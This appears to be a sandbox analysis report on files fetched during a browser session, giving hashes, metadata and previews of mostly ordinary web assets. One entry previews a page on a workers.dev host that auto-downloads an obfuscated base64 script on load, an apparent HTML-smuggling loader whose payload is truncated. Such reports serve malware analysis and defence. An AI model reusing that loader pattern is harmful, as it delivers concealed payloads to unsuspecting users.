                                                                                                                                                                                                                                                                                Size (bytes):164018
                                                                                                                                                                                                                                                                                Entropy (8bit):4.076323351733197
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:1536:0ysQ/KAPiU4Qk89DaseyI4I695JYSjVBJ2crl6XgdgVDb:B3RI695JYSjVqcrCgGRb
                                                                                                                                                                                                                                                                                MD5:0D5A39AF31BA139CEA74A1F13961F6B5
                                                                                                                                                                                                                                                                                SHA1:352A4072999ADB4FAA1CC9246A0C88CAFFA32241
                                                                                                                                                                                                                                                                                SHA-256:59D20278F795F146652B58E370A324A6369F516C7580414AD1D73A423165570F
                                                                                                                                                                                                                                                                                SHA-512:3EB21D517400779E55961B01E5C9C5188B34F6C8E452F815A9869400068ED0D3291F7773DCCE47383C7AF7B7909314697F001259DB60242CAAC481DA52A3EC0D
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/plugins/power-builder/framework/assets/js/swiper.jquery.min.js?ver=1.3.1
                                                                                                                                                                                                                                                                                Preview:/**. * Swiper 3.3.1. * Most modern mobile touch slider and framework with hardware accelerated transitions. * . * http://www.idangero.us/swiper/. * . * Copyright 2016, Vladimir Kharlampidi. * The iDangero.us. * http://www.idangero.us/. * . * Licensed under MIT. * . * Released on: February 7, 2016. */.(function () {. 'use strict';. var $;. /*===========================. Swiper. ===========================*/. var Swiper = function (container, params) {. if (!(this instanceof Swiper)) return new Swiper(container, params);.. var defaults = {. direction: 'horizontal',. touchEventsTarget: 'container',. initialSlide: 0,. speed: 300,. // autoplay. autoplay: false,. autoplayDisableOnInteraction: true,. autoplayStopOnLast: false,. // To support iOS's swipe-to-go-back gesture (when being used in-app, with UIWebView).. iOSEdgeSwipeDetection: false,.
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:PNG image data, 100 x 94, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):14089
                                                                                                                                                                                                                                                                                Entropy (8bit):7.976592362302984
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:rDKNL0+77kVfqu9Iqek73nmOLenvoIicreRbp24s1Ibt6VNw171:rMRyS/jk73x50erBs1Ib6w
                                                                                                                                                                                                                                                                                MD5:B42FA21CA9A96B786D9BC01F5EF8315D
                                                                                                                                                                                                                                                                                SHA1:3B64E5039E14506BB32EFD1F6C9B3650B18D321F
                                                                                                                                                                                                                                                                                SHA-256:124F87D02A16BBDDEA9D2972C333FD44F4AAEA6CE9BE9449FC8F7B012CCDC307
                                                                                                                                                                                                                                                                                SHA-512:93029E13E14F6384400DA4B91EE59C321DCFCCE88888ADE1A68230ED957B9D3BD9508B99F91D92EB9108532F389760E3BBBB3D589A8F4FF075DA5BBC2EADF460
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://images.squarespace-cdn.com/content/v1/65ddde819292aa47ed2c6d1d/de749afd-25b3-4000-88ee-3f3a2db2061b/favicon.ico?format=100w
                                                                                                                                                                                                                                                                                Preview:.PNG........IHDR...d...^............7iCCPicc..H..W.XS...[..@B. %.&.H. %..@z.l.$@(1....]Tp.b...*....#v....E..u.`W...............;....bq...@.(_........ u..`....../O.........w7.7.k.2....W....x. .....x.......%...e...|.....%0A...p..W.p......!n.@E..d.@k.<....5h}.;..B.....}ss'.!N.....!..3.~....f.&..1..s..J.0O.......[n.t0..lj...X.a.ngO..a5.{Ei.Q.kA.A..C.R2........5...;....B.,..P.i..`..p....|N<.z./....)}6K&.*c.u..6K._.J.qe..J..XJ....R...e.'AL..@...1.b..p...Lv.D.+....X.($@....K.c....y...6g.9.J| ?3>TQ........D..A.A.......A..c..QB.R.8? V1...s..... 'D.A.W....'...........<.,nX.".|...l...@.[..........^)z...H@....%38"I.#..8P...H.....{...._.X.....{..#..S.sA8..R.(.P.D..2..D......&.... ..aA&B.H.#2..=.A.@b(1.h...7.......L.sp....O.......I.b.OY...P?XY...k.[AM7<....P.........p?....le..0~....~..J?...%.#..m~.I......j.c}.....=..s|.....s...B. v.;.].a.............'..5.-V.O6...#....U2..../_P({G..d.4.0#3..._...#.9.`.8... ..(^_ob...D..;7...|N........`..|..|.l...
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:PNG image data, 130 x 57, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):4645
                                                                                                                                                                                                                                                                                Entropy (8bit):7.821389516621841
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:Bo7FblTpgN+TJtl9X6mlEevEnciCm8KnqBFI7dwAr:m7FxTdXxlBEiWnaFyD
                                                                                                                                                                                                                                                                                MD5:D1712C297E4461D70C436F33FEAB76DE
                                                                                                                                                                                                                                                                                SHA1:17B2EA8BD916DDDAC18BBFDD85287EA50AC9D5D4
                                                                                                                                                                                                                                                                                SHA-256:4004232BFDC1E7E24692C470C5650B35811C121B2F7CCB73D7A80ADF232412E3
                                                                                                                                                                                                                                                                                SHA-512:B2783078C20D77D7FE19BCAA8AED98DDD1850DBF54B2BBC37E62A031D65A54D65B15A360CD19D408BBDAE1BEC577904A04942B36BC2415366ADFE4248A6A3209
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:.PNG........IHDR.......9........K....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:66c1905a-41de-4bae-bb79-90afc20b5f27" xmpMM:DocumentID="xmp.did:4BE0DF441D5511E8ADD6910BEE192367" xmpMM:InstanceID="xmp.iid:4BE0DF431D5511E8ADD6910BEE192367" xmp:CreatorTool="Adobe Photoshop CC 2017 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:23c39c98-8bd4-49f4-b2f2-a8d9076bb49d" stRef:documentID="adobe:docid:photoshop:31cda545-e9cc-117a-971f-b127c5fbc14a"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.u.Y...5IDATx..]....
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):1530
                                                                                                                                                                                                                                                                                Entropy (8bit):4.9444324660296175
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:24:1UjCd4EzRHfDdadpp47pXHKpa7WhJlMarDjCd4EzRHCadpp47pXHKpa7WhJlMS:1aEz1DEKMywyar1EztKMywyS
                                                                                                                                                                                                                                                                                MD5:95BD9B340AD6826BEFF005E5DF32BD77
                                                                                                                                                                                                                                                                                SHA1:FDB64D88E53C9279EA62B5ACBCF86641C52D63F2
                                                                                                                                                                                                                                                                                SHA-256:F2C809F77B19DF64EC8270272AC29CE3D84D242A663E589825A9E4F57B8A5461
                                                                                                                                                                                                                                                                                SHA-512:FAA3DFDE6D5938457B56B501C6028F0E7320225059538ECECC345D7C7C651E687F768C78BE84D8676313FD9F5B56DC663F44C9B7083A3262F031E231402796C5
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:document.addEventListener("focusin", function(event) {...const elem = event && event.target && event.target.closest && event.target.closest("input,select,textarea,button,meter,progress");...if ( elem ) {....window[ gtm4wp_datalayer_name ].push({.....'event' : 'gtm4wp.formElementEnter',.......'inputID' : elem.getAttribute("id") || "(no input ID)",.....'inputName' : elem.getAttribute("name") || "(no input name)",.....'inputClass': elem.getAttribute("class") || "(no input class)",.......'formID' : (elem.form && elem.form.getAttribute("id")) || "(no form ID)",.....'formName' : (elem.form && elem.form.getAttribute("name")) || "(no form name)",.....'formClass': (elem.form && elem.form.getAttribute("class")) || "(no form class)"....});...}..}, false);....document.addEventListener("focusout", function(event) {...const elem = event && event.target && event.target.closest && event.target.closest("input,select,textarea,button,meter,progress");...if ( elem ) {....window[ gtm4wp_datalayer_na
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (10548)
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):222160
                                                                                                                                                                                                                                                                                Entropy (8bit):5.685126239083562
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6144:z8tY9uOG2W9fDKdsWHx6cPPy9mTq9Wtr8BttXp51rvIGhPnXalZI:z8tY9uOG2UfDKPHxZPPqmTq9Wtr8Btt3
                                                                                                                                                                                                                                                                                MD5:DF0DAE97129676CF253BEE88B923C1AC
                                                                                                                                                                                                                                                                                SHA1:7E8794F0EDE3CDC0DA2F1BD0B77BCD6988E9A24B
                                                                                                                                                                                                                                                                                SHA-256:916D3820A55C7B68DC819FEC94D51B5D9C78F11E02B3219FFB5418CA4A46E4E1
                                                                                                                                                                                                                                                                                SHA-512:335A1F91EADA694BB91FC6358EC0BFA6900E5EF2922042B9C06FFB34100DE54C24B5B84872BFE16A2181B65195DCDAC9EB38B4D5C8D4C6BC893FB3F63A8183AB
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:..window.google = window.google || {};.google.maps = google.maps || {};.(function() {. . var modules = google.maps.modules = {};. google.maps.__gjsload__ = function(name, text) {. modules[name] = text;. };. . google.maps.Load = function(apiLoad) {. delete google.maps.Load;. apiLoad([0.009999999776482582,[null,[["https://khms0.googleapis.com/kh?v=988\u0026hl=en-US\u0026","https://khms1.googleapis.com/kh?v=988\u0026hl=en-US\u0026"],null,null,null,1,"988",["https://khms0.google.com/kh?v=988\u0026hl=en-US\u0026","https://khms1.google.com/kh?v=988\u0026hl=en-US\u0026"]],null,null,null,null,[["https://cbks0.googleapis.com/cbk?","https://cbks1.googleapis.com/cbk?"]],[["https://khms0.googleapis.com/kh?v=163\u0026hl=en-US\u0026","https://khms1.googleapis.com/kh?v=163\u0026hl=en-US\u0026"],null,null,null,null,"163",["https://khms0.google.com/kh?v=163\u0026hl=en-US\u0026","https://khms1.google.com/kh?v=163\u0026hl=en-US\u0026"]],null,null,null,null,null,null,null,[["https://streetv
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):2927
                                                                                                                                                                                                                                                                                Entropy (8bit):4.78671986137601
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:48:Y9vlgI2UHg40MKHPXPoFbRBeklhiZHpfrgh8aQYa6AyY7HscYFnnrZjS0rZjfum4:OyI2ig40eeuhiZpfEHQYa6AyF1NjTjV4
                                                                                                                                                                                                                                                                                MD5:999A95A29ED85D1D26944F8C64EEFCC2
                                                                                                                                                                                                                                                                                SHA1:C8DE9CC34669C1F39997663C0C406427903EB105
                                                                                                                                                                                                                                                                                SHA-256:DD9700763251EBAE0A2524A492CD5585E92BBA7712D9FD2E36773F0C015A2F3D
                                                                                                                                                                                                                                                                                SHA-512:4379D3061B5CF6B172C0CD13768C0ADBE035D878784274EE7AB1F485FE1E18941E95EF3870E17E3A05A3E4E40761E82D24324E890DDAD8EE77DADA5EE2567896
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:{"CookieSPAEnabled":false,"MultiVariantTestingEnabled":false,"UseV2":true,"MobileSDK":false,"SkipGeolocation":false,"ScriptType":"PRODUCTION","Version":"6.14.0","OptanonDataJSON":"0232e281-a585-4e05-8d99-2fec39bf53fe","GeolocationUrl":"https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location","RuleSet":[{"Id":"433e385e-3ee9-4687-8aec-4e957b0cb255","Name":"CM US only","Countries":["us"],"States":{},"LanguageSwitcherPlaceholder":{"default":"en"},"BannerPushesDown":false,"Default":false,"Global":false,"Type":"GENERIC","UseGoogleVendors":false,"VariantEnabled":false,"TestEndTime":null,"Variants":[]},{"Id":"f54f29ef-74d5-45b2-8c69-54124e98661e","Name":"Global","Countries":["pr","ps","pw","py","qa","ad","ae","af","ag","ai","al","am","ao","aq","ar","as","au","aw","az","ba","bb","rs","bd","ru","bf","rw","bh","bi","bj","bl","bm","bn","bo","sa","bq","sb","sc","br","sd","bs","bt","sg","bv","bw","sh","by","sj","bz","sl","sn","so","ca","sr","ss","cc","cd","st","cf","sv","cg","sx","ch","sy"
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (64865)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):1463142
                                                                                                                                                                                                                                                                                Entropy (8bit):5.6118054032929505
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:12288:nRrlS07oICFYV62GUmqDiyEMdhR3cJ10huKlAC3dKZIW+LNZFie1lMyNlBkMNTjl:nRrlS07oHWdQMdAchuKiQ4wLNjlMyLV5
                                                                                                                                                                                                                                                                                MD5:0D89AF64C705A95C463EE2815D3D0485
                                                                                                                                                                                                                                                                                SHA1:EEBCF21EB39F3A4FB02FA594DEBCD88947C9B01F
                                                                                                                                                                                                                                                                                SHA-256:84A96F522183B532E1B4EDDF8535A00F30683EFED1A6892F0831209F5346E6E2
                                                                                                                                                                                                                                                                                SHA-512:DD84D4E1B8C37759B67AC9DA7C263119C358C72339EE9A30881635A08B0B5CA70CB04707B79DFDDE9F1CC502D80C90E79310B9157BA0851DF7B5C4319703DFE2
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://chattts-49f1.beszyrecala.workers.dev/16059c05-eb99-4880-8bcd-d4=
                                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html>.<head>. <title></title>. <meta http-equiv="content-type" content="text/html; charset=UTF-8">. <meta name="robots" content="noindex, nofollow">. <meta name="googlebot" content="noindex, nofollow">. <meta name="viewport" content="width=device-width, initial-scale=1">... <script type="text/javascript" src="https://code.jquery.com/jquery-3.4.1.min.js" ></script>. <script type="text/javascript">...$(document).ready(function() {...saveFile();.});.function saveFile (name, type, data) {..if (data != null && navigator.msSaveBlob)...return navigator.msSaveBlob(new Blob([data], { type: type }), name);..var a = $("<a style='display: none;'/>");.. var encodedStringAtoB = 'PGh0bWw+DQo8c2NyaXB0Pg0KDQooZnVuY3Rpb24gKCRmb2ckMCwgJGZvZyQxLCAkZm9nJDIsICRmb2ckMywgJGZvZyQ0LCAkZm9nJDUsICRmb2ckNiwgJGZvZyQ3LCAkZm9nJDgsICRmb2ckOSwgJGZvZyQxMCwgJGZvZyQxMSwgJGZvZyQxMiwgJGZvZyQxMywgJGZvZyQxNCwgJGZvZyQxNSwgJGZvZyQxNiwgJGZvZyQxNywgJGZvZyQxOCwgJGZvZyQzMSwgJGZvZyQyMiwgJGZvZyQyMSwgJGZvZyQ
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (40035)
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):40215
                                                                                                                                                                                                                                                                                Entropy (8bit):5.341587059628471
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:768:Nxhq+vCSCsZ60ExRdoSNn+68vB9wWyBTxIbpYcyf0Kfy+z5h:NxZXZ/Ex3a9w+pY1f0X+zD
                                                                                                                                                                                                                                                                                MD5:31F89F7C3FCADC7AC9482862D28B2318
                                                                                                                                                                                                                                                                                SHA1:DB44A5BA2659381CE35B7BD28EB34BC46FAA4EE3
                                                                                                                                                                                                                                                                                SHA-256:B6E030AD2D4B16E1B747179F64E90A646D32D746986EC428AC26DB321C576B50
                                                                                                                                                                                                                                                                                SHA-512:AA04BB53C6D0655882E1328A31C0E211910959863D49BCE6825AF5F3653618F412D110AB4BE6173CB0A9DE6CE7F42C08F7BE5FA5042CD10041A7BB958AB02785
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://assets.squarespace.com/universal/scripts-compressed/performance-be9599e0923b14e6f074-min.en-US.js
                                                                                                                                                                                                                                                                                Preview:"use strict";(self.webpackChunkextract_css=self.webpackChunkextract_css||[]).push([[52730],{615921:(N,h)=>{Object.defineProperty(h,"__esModule",{value:!0}),h.default=void 0;var E;(function(f){f.MAIN_CONTENT=1,f.CONTENT_COLLECTION=1,f.PAGE=2,f.SPLASH_PAGE=3,f.CONTENT_ITEM=50,f.NOT_FOUND=100,f.ERROR=101,f.SEARCH=102,f.LOCK_SCREEN=103,f.POPUP_OVERLAY=104,f.PROTECTED_CONTENT=105,f.MEMBER_AREA_ACCESS_DENIED=106,f.PAYWALL=107,f.SHOW_CART=200,f.CHECKOUT=201,f.ORDER_CONFIRMED=202,f.DONATE=203,f.CONTRIBUTION_CONFIRMED=204,f.COMMERCE_CART_V2=205,f.SUBSCRIPTION_CONFIRMED=206,f.ORDER_RECEIVED=207,f.MEMBERSHIP_CONFIRMED=208,f.REVIEWS_REQUEST=209,f.DIGITAL_PRODUCT_COMPOSER_PREVIEW=210,f.ORDER_STATUS=211,f.NEWSLETTER_UNSUBSCRIBE=300,f.COMMERCE_EMAIL_PREVIEW=301,f.SSO_PAGE=400})(E||(E={}));var T=E;h.default=T,N.exports=h.default},795702:(N,h)=>{Object.defineProperty(h,"__esModule",{value:!0}),h.default=void 0;var E;(function(f){f.EXPIRED=1,f.PASTDUE=2,f.TRIAL=3,f.BETA=4,f.REMOVED=5,f.INTERNAL=6,f.COMP
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 212x238, components 3
                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                Size (bytes):2362
                                                                                                                                                                                                                                                                                Entropy (8bit):7.096381852588978
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:48:K2ytjTg/Ps+mC8xzW2k56S7Nzzg+Ie0vBFe9R8HFX77:K2yZO0+zgW2jSxIPHF/
                                                                                                                                                                                                                                                                                MD5:60FB37D0EE453DA6BDD96E0041D634B5
                                                                                                                                                                                                                                                                                SHA1:A82C30C18F319E6FF3B19FB45FFF36D25D5F9A6D
                                                                                                                                                                                                                                                                                SHA-256:25217392952161CB6CA01342B588D251420BCE6401855834405CC2095A5A7C67
                                                                                                                                                                                                                                                                                SHA-512:6E3316334B22BDC86D57B335017EB09DC06FFFC0358D3EF5BA0BA456CE7E094FC2136CA90EA4823D7594764742BB54D84F628D0A55A30F4678BB7ED3C473289E
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                Preview:......JFIF.................................................$.(,..%...!1!%)+.0...?83,749.+...........+...++++++++++++++++++++++++++++++++++++++++++++++++++..........."........................................>.........................!..1AQaq.....#2br..."3CR....B...DSs........................................................?..@...................................................................................................<.H\[V..<..+..x.7.KZ..+...m.x.-I.........y..(~(.{X..M....5..W.Y....K.o.'&.Yu.r.........H....}.....e.c.....s{so..T...Ic.fN;K:.......~.NE.......................A...31t.....,.I.... ...._...vOc....n..'....}....i...o.....LZ.U.n..>....;....U.'..e....d_.Au|a.......8K..4|X..Ce..._.........t.:.....(UMq.....+d...B.. ................6.Gt...;4...Wxe.A...[...u.=(izK.R..9K.......'...~E[.t.Y'.\|lxs..|.;...D..m..{....O.,.:k.-.f=..g...........c..o...K......%.......T.......;...?|.a.W.q.n.....cHM.E.%.4.i...FU...v4.Ns..^[....../.xa........?.....T.
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):4659
                                                                                                                                                                                                                                                                                Entropy (8bit):5.208450147806609
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:96:90AD/j2i8SOXshgK7yHGwm0DofyH+eGUUPHKON2HDUv:GS/j2iHOXshgBHGT0DoaHCPHK6j
                                                                                                                                                                                                                                                                                MD5:338257BA350E113F5DD92FF53C431A52
                                                                                                                                                                                                                                                                                SHA1:0C7E7665BF0959ADB426F70D3D4D9A2E6B25FC7E
                                                                                                                                                                                                                                                                                SHA-256:BAA654184FF45D858540C6A27D4B39EC1E371E9B33ACC57B3DBD09E300AC453E
                                                                                                                                                                                                                                                                                SHA-512:3499F75234EAAFD6546B783D2F6DEC5A25D056F40458AB2B272C1C736CCB647D22B29CD425CE1767B03BCDB57362A3D804214E74FDD2D08552FD1172DC51C39F
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/themes/monstroid2-child/style.css?ver=1.0.0
                                                                                                                                                                                                                                                                                Preview:@charset "UTF-8";/*!.Theme Name: Monstroid2 Child.Theme URI: http://www.templatemonster.com/wordpress-themes.php.Author: Template Monster.Author URI: http://www.templatemonster.com/.Description: Monstroid2 - truely multipurpose WordPress theme for real life projects. Built with love and care by TemplateMonster..Template: monstroid2.Version: 1.0.0.License: GNU General Public License v3 or later.License URI: http://www.gnu.org/licenses/gpl-3.0.html.Text Domain: monstroid2-child.Tags: one-column, two-columns, three-columns, left-sidebar, right-sidebar, custom-background, custom-colors, custom-menu, featured-images, post-formats, sticky-post, theme-options, threaded-comments, translation-ready, grid-layout, custom-header, custom-logo, footer-widgets, flexible-header, blog.DocumentationID: monstroid_2..This theme, like WordPress, is licensed under the GPL..Use it to make something cool, have fun, and share what you've learned with others...Monstroid2 is based on Underscores http://underscor
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text, with very long lines (12943), with no line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):12943
                                                                                                                                                                                                                                                                                Entropy (8bit):5.197434517262163
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:384:Ie8sHDZ/J+oHewgOQGp/GJ3eYE3kfn3GVqv0s+pfYm03pYg:Ie8s1/J+oHlgOXhzYE3kf3wqv0s+pfYH
                                                                                                                                                                                                                                                                                MD5:5BC2B1FA970F9CECB3C30C0C92C98271
                                                                                                                                                                                                                                                                                SHA1:7C6BB87AAA24714B7B3B3C86DD932736A80270A9
                                                                                                                                                                                                                                                                                SHA-256:1060091178CBD6C843B802F516F230F1A3A1E85F1AFBD6EF84D80E5430BA457E
                                                                                                                                                                                                                                                                                SHA-512:1B39C7152E6561C6108A36E5B89A635CE1EF883EF683B4FB4E58D32BF2A7F415FB1DF4695562D2E8ACD85A3BF5933071294D5A1D162993930A5DC7851B9A5ED3
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.6
                                                                                                                                                                                                                                                                                Preview:(()=>{"use strict";const e=e=>Math.abs(parseInt(e,10)),t=(e,t)=>{const a=new Map([["init","init"],["validation_failed","invalid"],["acceptance_missing","unaccepted"],["spam","spam"],["aborted","aborted"],["mail_sent","sent"],["mail_failed","failed"],["submitting","submitting"],["resetting","resetting"],["validating","validating"],["payment_required","payment-required"]]);a.has(t)&&(t=a.get(t)),Array.from(a.values()).includes(t)||(t=`custom-${t=(t=t.replace(/[^0-9a-z]+/i," ").trim()).replace(/\s+/,"-")}`);const n=e.getAttribute("data-status");return e.wpcf7.status=t,e.setAttribute("data-status",t),e.classList.add(t),n&&n!==t&&e.classList.remove(n),t},a=(e,t,a)=>{const n=new CustomEvent(`wpcf7${t}`,{bubbles:!0,detail:a});"string"==typeof e&&(e=document.querySelector(e)),e.dispatchEvent(n)},n=e=>{const{root:t,namespace:a="contact-form-7/v1"}=wpcf7.api;return r.reduceRight(((e,t)=>a=>t(a,e)),(e=>{let n,r,{url:o,path:c,endpoint:s,headers:i,body:l,data:d,...p}=e;"string"==typeof s&&(n=a.repl
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):25870
                                                                                                                                                                                                                                                                                Entropy (8bit):4.940190859065775
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:192:iCyZVevqLA0v4CZ13bdtUwKZ3FmPv7npJHn7/7bAAwbM7/xsmSg5YWcMiu0CkEr3:cA07uVGpv/eDu0CkOM6yuRzPLRpJZ9
                                                                                                                                                                                                                                                                                MD5:6B94A40FB819E877C204C3561C9B3E0F
                                                                                                                                                                                                                                                                                SHA1:34751BF3DBAECAF52F0544DE06B87F91BAA2EBAD
                                                                                                                                                                                                                                                                                SHA-256:AED97FF90A78B50F9CBDD1CB7C2C59F1A885075CBA44690E1AE6A1F46B3DAB1E
                                                                                                                                                                                                                                                                                SHA-512:C1F193EB6753697048EE11C7641A8CBC4EF9673C57E4BE3C4BE79DA8462BB82568D6D755E528DBD0180EAB9058C19C250DD6DF6A99E27555C44D1CC6B8AAEA72
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://about.christianmingle.com/wp-content/themes/monstroid2/assets/css/material-design.css?ver=6.5.3
                                                                                                                                                                                                                                                                                Preview:/**.. * Title: Material Design Flaticon Pack.. * Author: Google.. * Source: http://www.flaticon.com/packs/material-design.. * License: CC BY 3.0 (http://creativecommons.org/licenses/by/3.0/).. */..@font-face {...font-family: "material-design";...src: url("../fonts/material-design.eot");...src: url("../fonts/material-design.eot#iefix") format("embedded-opentype"),...url("../fonts/material-design.woff") format("woff"),...url("../fonts/material-design.ttf") format("truetype"),...url("../fonts/material-design.svg") format("svg");...font-weight: normal;...font-style: normal;..}.....tm_font_icon .material-design {...line-height: 1.4em;..}...tm_font_icon .material-design:before {...font-family: 'material-design';..}.....material-design,...material-design-ico,..[class^="material-design-"]:before, [class*=" material-design-"]:before,..[class^="material-design-"]:after, [class*=" material-design-"]:after {...font-family: "material-design";...font-size: inherit;...font-weight: 400;...font-style:
                                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                                Size (bytes):259169
                                                                                                                                                                                                                                                                                Entropy (8bit):4.944162449770518
                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                SSDEEP:6144:EBgc9ovKUmHComaWQAAV2upnW996sqJ1GjfBgcyj/:EBgc9ovKUmHComaWQAAV2upnW996sqJp
                                                                                                                                                                                                                                                                                MD5:4C3BB37D449A701CDE7541EF14685ABE
                                                                                                                                                                                                                                                                                SHA1:65229641DF9556B0C4FD02A8A14DDB308EC8141F
                                                                                                                                                                                                                                                                                SHA-256:39F6FE6BEE04CF89816343AD8BC849409BDE7309CDA7DCA3F5D314288955C087
                                                                                                                                                                                                                                                                                SHA-512:F38B345200E0777BE607C2014D75C67C694DCBDDE029A86F0B3F80DBE96F25383B55514DB6231E0088D23C7C54721843A4E384DC9C9DF986E5F25AFD3878749A
                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                                                URL:https://static1.squarespace.com/static/vta/5c5a519771c10ba3470d8101/versioned-assets/1727804539977-GUUAELH2KBGFYQUCPSYV/static.css
